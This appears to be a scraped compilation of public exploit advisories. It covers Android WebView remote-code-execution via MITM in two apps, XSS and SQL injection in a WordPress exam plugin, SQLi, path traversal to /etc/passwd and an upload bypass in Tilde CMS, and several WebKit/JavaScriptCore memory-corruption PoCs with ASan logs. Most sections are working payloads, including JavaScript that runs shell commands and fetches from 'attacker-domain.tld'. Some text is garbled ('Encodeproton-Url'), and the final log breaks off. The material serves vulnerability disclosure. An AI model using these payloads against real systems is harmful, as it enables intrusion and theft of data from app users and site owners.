Reference: "String str2 = "http://www.virtualpostage.com.au/auth.asp?Username=" + stringUtils.Encodeproton-Url(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.Encodeproton-Url(mostCurrent._edittext2.getText(), "UTF8");"

Shouts: SubHacker and the rest of the awesome infosec community.


-:: The Advisory ::-
The Android application is vulnerable to Remote Code Execution via Man-In-The-Middle (MITM) attacks. 
This is caused by the following lines of code within the \a2\virtualpostage\com\main.java file: (Lines 442 - 448)

            StringUtils stringUtils = new StringUtils();
            String str2 = "http://www.virtualpostage.com.au/auth.asp?Username=" + stringUtils.EncodeUrl(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.EncodeUrl(mostCurrent._edittext2.getText(), "UTF8");
            WebViewExtras webViewExtras = mostCurrent._webviewextras1;
            WebViewExtras.addJavascriptInterface(mostCurrent.activityBA, (WebView) mostCurrent._webview1.getObject(), "B4A");
            mostCurrent._webview1.LoadUrl(str2);
            mostCurrent._t.Initialize(processBA, "LOGGINGIN", 15000);
            mostCurrent._t.setEnabled(true);


In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml)
    <uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" />

If an attacker performs a MITM attack against "www.virtualpostage.com.au" by e.g. hijacking the domain name, DNS, IP prefix, or by 
serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.virtualpostage.com.au", 
then the attacker can instruct the Android application to execute attacker controlled Java code that the phone will execute in the 
context of the application.

The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions can be 
used to execute arbitrary Java code by using reflection to access public methods with attacker provided JavaScript.


-:: Proof of Concept ::-
A successful attack that makes "www.virtualpostage.com.au" serve the following code:
<script>
  function execute(cmd){
    return B4A.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
  }
  execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a2.virtualpostage.com/owned']);
  execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']);
  </script>
  This application has been owned.

Will make the Android application create a new file in the App directory named: owned, and also play a video chosen by the attacker as an example.

Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.

The vulnerable HTTP request is triggered when a user attempts to log in with any set of credentials.


-:: Solution ::-
The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used:
    WebView webView = new WebView(this);
    setContentView(webView);
    ...
Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
    <manifest>
    <uses-sdk android:minSdkVersion="17" />
    ...
    </manifest>

The URL used ("http://www.virtualpostage.com.au") should ALSO use HTTPS (and verify the hostname and certificate properly).

Last but not least, the following code can also be used to determine whether the addJavascriptInterface should be enabled or not:
    private void exposeJsInterface() {
        if (VERSION.SDK_INT < 17) {
            Log.i(TAG, "addJavascriptInterface() bridge disabled.");
        } else {
            addJavascriptInterface(Object, "EVENT_NAME_HERE");
        }
    }

In relation to the credentials being sent over plain-text HTTP GET requests, the following are the most basic recommendations to be implemented:
- All URLS within the application must utilize HTTPS.
- Certificate pinning should also be implemented.
- Usernames and passwords should not be sent over HTTP GET requests, HTTP POST requests should be used instead.


References:
http://50.56.33.56/blog/?p=314
https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614

Filename: a2.virtualpostage.com_manual.apk
File size: 304,307 bytes

md5: 1da27e27eb8447ab489eb1aae3cd14f6
sha1: f67a2c1f55879024c5ecd1194e6704a4286ea021
sha256: 0813eb25d08d877af66c8570153580da2c1df3fb873270422dca6be8dbe98932

App Name: VPA
Package Name: a2.virtualpostage.com 
Package Version: 1.0


Disclosure Timeline:
- 20Jul17: Vendor is informed about advisories.
- 20Jul17: Vendor responds: https://ghostbin.com/paste/jrt2e#L28
- 20Jul17: InterN0T email to vendor: https://ghostbin.com/paste/zjcam
- 20Jul17: Vendor responds: https://ghostbin.com/paste/vzv3y
- 20Jul17: Advisory released to the public.

=== EOF ===
HireHackking 
# Exploit Title: IBPS Online Exam Plugin for WordPress v1.0 - XSS SQLi
# Date: 2017-07-11
# Exploit Author: 8bitsec
# Vendor Homepage: https://elfemo.com/demo/server2/order2032/
# Software Link: https://codecanyon.net/item/ibps-online-exam-plugin-for-wordpress/20028534
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-07-20

Product & Service Introduction:
===============================
A Full Featured WordPress Plugin for IBPS Examination.

Technical Details & Description:
================================

Stored XSS on exam input textfields.

Blind SQL Injection on examapp_UserResult page id parameter.

Proof of Concept (PoC):
=======================

Authenticated Stored XSS:

Logged as a student:
Write the payload in the input textfields while attempting an exam. The payload will execute on My Results > View Details:
https://localhost/wp-admin/admin.php?page=examapp_UserResult&info=view&id=[xx]

Blind SQL Injection

Logged as a student:

https://localhost/wp-admin/admin.php?page=examapp_UserResult&info=view&id=79 and 1=1

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=examapp_UserResult&info=view&id=78 AND 6705=6705

    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: page=examapp_UserResult&info=view&id=-4748 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178716b71,0x6b4c5247597261614e73447378544741764b4f7172597a5a58494551685a7056644d6e595773496e,0x7162787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KttP

Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
HireHackking 
# Exploit Title: SKILLS.com.au Industry App - Remote Code Execution via MITM
# Date: 20/Jul/17
# Exploit Author: MaXe
# Vendor Homepage: https://play.google.com/store/apps/details?id=a3.skills.com [http://archive.is/NRlNP]
# Software Link: N/A
# Screenshot: N/A
# Version: 1.0
# Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86
# CVE : N/A

 SKILLS.com.au Industry App - Remote Code Execution via MITM

Version affected: 1.0

App Info: The Android application reviewed is used to log into the skills.com.au website.

External Links: 
https://play.google.com/store/apps/details?id=a3.skills.com [http://archive.is/NRlNP]


Credits: MaXe (@InterN0T) 

Special Thanks: Geoff Ellis for also identifying credentials being sent over HTTP GET requests before InterN0T did: 
https://www.linkedin.com/pulse/insecure-mobile-application-programming-practices-case-geoff-ellis [http://archive.is/LvSeb]
Reference: "String str2 = "http://www.skills.com.au/auth.asp?Username=" + stringUtils.Encodeproton-Url(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.Encodeproton-Url(mostCurrent._edittext2.getText(), "UTF8");"

Shouts: SubHacker and the rest of the awesome infosec community.


-:: The Advisory ::-
The Android application is vulnerable to Remote Code Execution via Man-In-The-Middle (MITM) attacks. 
This is caused by the following lines of code within the \a3\skills\com\main.java: (Lines 442 - 448)

            StringUtils stringUtils = new StringUtils();
            String str2 = "http://www.skills.com.au/auth.asp?Username=" + stringUtils.EncodeUrl(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.EncodeUrl(mostCurrent._edittext2.getText(), "UTF8");
            WebViewExtras webViewExtras = mostCurrent._webviewextras1;
            WebViewExtras.addJavascriptInterface(mostCurrent.activityBA, (WebView) mostCurrent._webview1.getObject(), "B4A");
            mostCurrent._webview1.LoadUrl(str2);
            mostCurrent._t.Initialize(processBA, "LOGGINGIN", 15000);
            mostCurrent._t.setEnabled(true);


In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml)
    <uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" />

If an attacker performs a MITM attack against "www.skills.com.au" by e.g. hijacking the domain name, DNS, IP prefix, or by 
serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.skills.com.au", 
then the attacker can instruct the Android application to execute attacker controlled Java code that the phone will execute 
in the context of the application.

The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions 
can be used to execute arbitrary Java code by using reflection to access public methods with attacker provided JavaScript.


-:: Proof of Concept ::-
A successful attack that makes "www.skills.com.au" serve the following code:
<script>
  function execute(cmd){
    return B4A.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
  }
  execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a3.skills.com/owned']);
  execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']);
  </script>
  This application has been owned.

Will make the Android application create a new file in the App directory named: owned, and also play a video chosen by the attacker as an example.

Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.

The vulnerable HTTP request is triggered when a user attempts to log in with any set of credentials.


-:: Solution ::-
The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used:
    WebView webView = new WebView(this);
    setContentView(webView);
    ...
Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
    <manifest>
    <uses-sdk android:minSdkVersion="17" />
    ...
    </manifest>

The URL used ("http://www.skills.com.au") should ALSO use HTTPS (and verify the hostname and certificate properly).

Last but not least, the following code can also be used to determine whether the addJavascriptInterface should be enabled or not:
    private void exposeJsInterface() {
        if (VERSION.SDK_INT < 17) {
            Log.i(TAG, "addJavascriptInterface() bridge disabled.");
        } else {
            addJavascriptInterface(Object, "EVENT_NAME_HERE");
        }
    }

In relation to the credentials being sent over plain-text HTTP GET requests, the following are the most basic recommendations to be implemented:
- All URLS within the application must utilize HTTPS.
- Certificate pinning should also be implemented.
- Usernames and passwords should not be sent over HTTP GET requests, HTTP POST requests should be used instead.


References:
http://50.56.33.56/blog/?p=314
https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614

Filename: a3.skills.com_manual.apk
File size: 332,914 bytes

md5: d1022a25893ec8549234d20fa55c13f8
sha1: 96f85493332e9b2a2efecc4acdca75f84c13809d
sha256: e1724043dbca70a76a33598d3483fba51ae171ed0d05a4e5cacab103c1c2a21c

App Name: SKILLS.com.au Industry App
Package Name: a3.skills.com 
Package Version: 1.0


Disclosure Timeline:
- 20Jul17: Vendor is informed about advisories.
- 20Jul17: Vendor responds: https://ghostbin.com/paste/jrt2e#L28
- 20Jul17: InterN0T email to vendor: https://ghostbin.com/paste/zjcam
- 20Jul17: Vendor responds: https://ghostbin.com/paste/vzv3y
- 20Jul17: Advisory released to the public.

=== EOF ===
HireHackking 
# Exploit Title: Tilde CMS 1.01 Multiple Vulnerabilities
# Date: July 7th, 2017
# Exploit Authors: Paolo Forte, Raffaele Forte <raffaele@backbox.org>
# Vendor Homepage: http://www.tildenetwork.com/
# Version: Tilde CMS 1.0.1
# Tested on: Ubuntu 12.04, PHP 5.3.10


I. INTRODUCTION
========================================================================
Tilde CMS is closed-source content management system created by 
tildenetwork.com


II. DESCRIPTION
========================================================================
The web application suffers of multiple vulnerabilities.

1. SQL Injection
------------------------------------------------------------------------
Due to missing escaping of the backtick character, the following query in 
the source code is vulnerable:

[class.SystemAction.php]

	$SQL_string = "SELECT * FROM `form_table_".$id_form."` WHERE ID='$idForm'";
	$SQL_oldData = @mysql_query($SQL_string,$this->DB_conn);

The vulnerability can be trigged via a POST request as shown in the
following PoC: 

	POST /actionphp/action.input.php HTTP/1.1

	ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1` WHERE 
	SLEEP(5)-- aaa &idForm=1234567890

The resulting query on the server-side will be:
	SELECT * FROM `form_table_1` WHERE SLEEP(5)-- aaa ` WHERE ID='1234567890'

For a succesful exploitation, the table "form_table_1" must be valid.


2. Path Traversal
------------------------------------------------------------------------
The vulnerabilty exists on this method:

	GET /actionphp/download.File.php?&file=../../../../../../etc/passwd


3. Arbitrary Files Upload
------------------------------------------------------------------------
It is possible to bypass the implemented restrictions shown in the 
following snippet of the code:

	$file=$_FILES['file'.$i]['tmp_name'];
	if (($file!="")&&($file!="none")) {
		$source_file=$file;
		$file_name=$_FILES['file'.$i]['name'];
		$file_name=str_replace(".php",".txt",$file_name);
		$file_name=str_replace(" ","_",$file_name);
		$file_name=str_replace("+","",$file_name);

A file named "filename.+php" will be renamed in "filename.php", therefore 
successfully uploaded.


4. Insecure Direct Object References
------------------------------------------------------------------------
It is possible to retrieve sensitive resources by using direct references.
A low privileged user can load the PHP resources such as: 

	admin/content.php
	admin/content.php?method=ftp_upload


IV. BUSINESS IMPACT
========================================================================
These flaws may compromise the integrity of the system and/or expose 
sensitive information.


V. SYSTEMS AFFECTED
========================================================================
Tilde CMS 1.01 is vulnerable (probably all previous versions)


VI. VULNERABILITY HISTORY
========================================================================
July 6th, 2017: Vulnerability identification
July 7th, 2017: Vendor notification
July 13th, 2017: Vendor notification


VII. LEGAL NOTICES
========================================================================
The information contained within this advisory is supplied "as-is" with 
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuseof this 
information.
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1256

Here's a snippet of ObjectPatternNode::appendEntry.

void appendEntry(const JSTokenLocation&, ExpressionNode* propertyExpression, DestructuringPatternNode* pattern, ExpressionNode* defaultValue, BindingType bindingType)
{
    m_targetPatterns.append(Entry{ Identifier(), propertyExpression, false, pattern, defaultValue, bindingType });
}

Here's the definition of Entry.

struct Entry {
    const Identifier& propertyName;
    ExpressionNode* propertyExpression;
    bool wasString;
    DestructuringPatternNode* pattern;
    ExpressionNode* defaultValue;
    BindingType bindingType;
};

The Identifier object created by "Identifier()" is in the stack. So it will get freed in the end of the appendEntry method.

PoC:

var {[a]: b, ...[]} = {};
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1262

Here is a snippet of ArgumentsEliminationPhase::transform
    case LoadVarargs:
        ...
        if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {
            ...
            if (argumentCountIncludingThis <= varargsData->limit) {
                storeArgumentCountIncludingThis(argumentCountIncludingThis);
                // store arguments
                ...
            }

            node->remove();
            node->origin.exitOK = canExit;
            break;
        }

Whether or not the "argumentCountIncludingThis <= varargsData->limit" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length.

PoC:
-->

const kArgsLength = 0x101;

let buggy = null;
function inlineFunc() {
    if (arguments.length != kArgsLength) {
        buggy = arguments;
    }
}

class ClassForInine extends inlineFunc {
}

function sleep(ms) {
    let start = new Date();
    while (new Date() - start < ms);
}

function main() {
    let args = new Array(kArgsLength);
    args.fill(333 + 1);
    args = args.join(', ');

    let opt = new Function(`(() => {
        new ClassForInine(${args});
    })();`);

    for (let i = 0; i < 0x100000; i++) {
        opt();

        if (i === 0x3000)
            sleep(1000);

        if (buggy) {
            print('buggy.length: ' + buggy.length);
            break;
        }
    }

    for (let i = 0, n = buggy.length; i < n; i++) {
        print(buggy[i]);
    }
}

main();
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1236

WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy

Here's a snippet of JSArray::appendMemcpy.

bool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)
{
    auto scope = DECLARE_THROW_SCOPE(vm);

    if (!canFastCopy(vm, otherArray))
        return false;

    IndexingType type = indexingType();
    IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());
    if (type == ArrayWithUndecided && copyType != NonArray) {
        if (copyType == ArrayWithInt32)
            convertUndecidedToInt32(vm);
        else if (copyType == ArrayWithDouble)
            convertUndecidedToDouble(vm);
        else if (copyType == ArrayWithContiguous)
            convertUndecidedToContiguous(vm);
        else {
            ASSERT(copyType == ArrayWithUndecided);
            return true;
        }
    } else if (type != copyType)
        return false;

    ...

    if (type == ArrayWithDouble)
        memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);
    else
        memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);

    return true;
}

The method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.
So, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.

PoC:
-->

function optNewArrayAndConcat() {
    let a = [,,,,,,,,,];
    return Array.prototype.concat.apply(a);
}

function main() {
    Array.prototype.constructor = {
        [Symbol.species]: function () {
            return [{}];
        }
    };

    gc();

    for (let i = 0; i < 0x10000; i++) {
        optNewArrayAndConcat().fill({});
    }

    gc();

    for (let i = 0; i < 0x20000; i++) {
        let res = optNewArrayAndConcat();
        if (res[0])
            print(res.toString());
    }
}

main();
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1234

Here's a snippet of arrayProtoFuncSplice.

EncodedJSValue JSC_HOST_CALL arrayProtoFuncSplice(ExecState* exec)
{
    ...

            result = JSArray::tryCreateForInitializationPrivate(vm, exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(ArrayWithUndecided), actualDeleteCount);
            if (UNLIKELY(!result)) {
                throwOutOfMemoryError(exec, scope);
                return encodedJSValue();
            }

            // The result can have an ArrayStorage indexing type if we're having a bad time.
            bool isArrayStorage = hasAnyArrayStorage(result->indexingType());
            bool success = false;
            if (UNLIKELY(isArrayStorage)) {
                static const bool needToFillHolesManually = true;
                success = copySplicedArrayElements<needToFillHolesManually>(exec, scope, result, thisObj, actualStart, actualDeleteCount);
            } else {
                ASSERT(hasUndecided(result->indexingType()));
                static const bool needToFillHolesManually = false;
                success = copySplicedArrayElements<needToFillHolesManually>(exec, scope, result, thisObj, actualStart, actualDeleteCount);
            }
            if (UNLIKELY(!success)) {
                ASSERT(scope.exception());
                return encodedJSValue();
            }
    ...
}

|result| has uninitalized values. If a GC is triggered before those values get initalized, the garbage collector will refer the uninitialized values.

PoC:
-->

function gc() {
    for (let i = 0; i < 4; i++)
        new ArrayBuffer(0x1000000);
}

Array.prototype.__defineGetter__(1000, () => 0);

for (let i = 0; i < 0x1000; i++)
    new Array(0x10).fill([{}, {}, {}, {}]);

for (let i = 0; i < 0x1000; i++) {
    let x = {length: 0x10};
    x.__defineGetter__(0, () => gc());
    Array.prototype.splice.call(x, 0);
}
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1234

Here's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).

void flush(InlineStackEntry* inlineStackEntry)
{
	...
    if (m_graph.needsScopeRegister())
        flush(m_codeBlock->scopeRegister()); <<--- (a)
}

At (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.

PoC:
-->

function f() {
    (function () {
    	eval('1');
    	f();
    }());

    throw 1;
}

f();
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1246

There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.

Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.

PoC:

=================================================================
-->

<style>
#link { text-transform: lowercase; }
link::first-letter { border-spacing: 1em; }
</style>
<script>
function go() {
  dt.appendChild(link);
  var s = link.style;
  s.setProperty("display", "table-column-group");
  s.setProperty("-webkit-appearance", "menulist-button");
}
function eventhandler() {
  dir.setAttribute("aria-labeledby", "meta");
  link.appendChild(table.rows[0]);
}
</script>
<body onload=go()>
<link id="link">
<meta id="meta">
<dir id="dir">
<table id="table">
<th>1</th>
<dt id="dt">
<iframe onload="eventhandler()"></iframe>

<!--
=================================================================

ASan log:

=================================================================
==30692==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000090ac8 at pc 0x00010841ba26 bp 0x7fff5ca8ea60 sp 0x7fff5ca8ea58
READ of size 4 at 0x608000090ac8 thread T0
==30692==WARNING: invalid path to external symbolizer!
==30692==WARNING: Failed to use and restart external symbolizer!
    #0 0x10841ba25 in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25)
    #1 0x10a8983fe in WebCore::RenderElement::addChild(WebCore::RenderObject*, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24e73fe)
    #2 0x10ab7d6ec in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6ec)
    #3 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)
    #4 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)
    #5 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)
    #6 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)
    #7 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)
    #8 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
    #9 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
    #10 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
    #11 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
    #12 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
    #13 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
    #14 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
    #15 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
    #16 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
    #17 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
    #18 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
    #19 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
    #20 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
    #21 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
    #22 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
    #23 0x1162c0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
    #24 0x1162c0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
    #25 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
    #26 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
    #27 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
    #28 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
    #29 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
    #30 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
    #31 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
    #32 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
    #33 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
    #34 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
    #35 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
    #36 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
    #37 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
    #38 0x10316c56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
    #39 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)

0x608000090ac8 is located 40 bytes inside of 96-byte region [0x608000090aa0,0x608000090b00)
freed by thread T0 here:
    #0 0x1031d4294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
    #1 0x116307f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
    #2 0x10a79d874 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderElement*, WebCore::RenderText*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ec874)
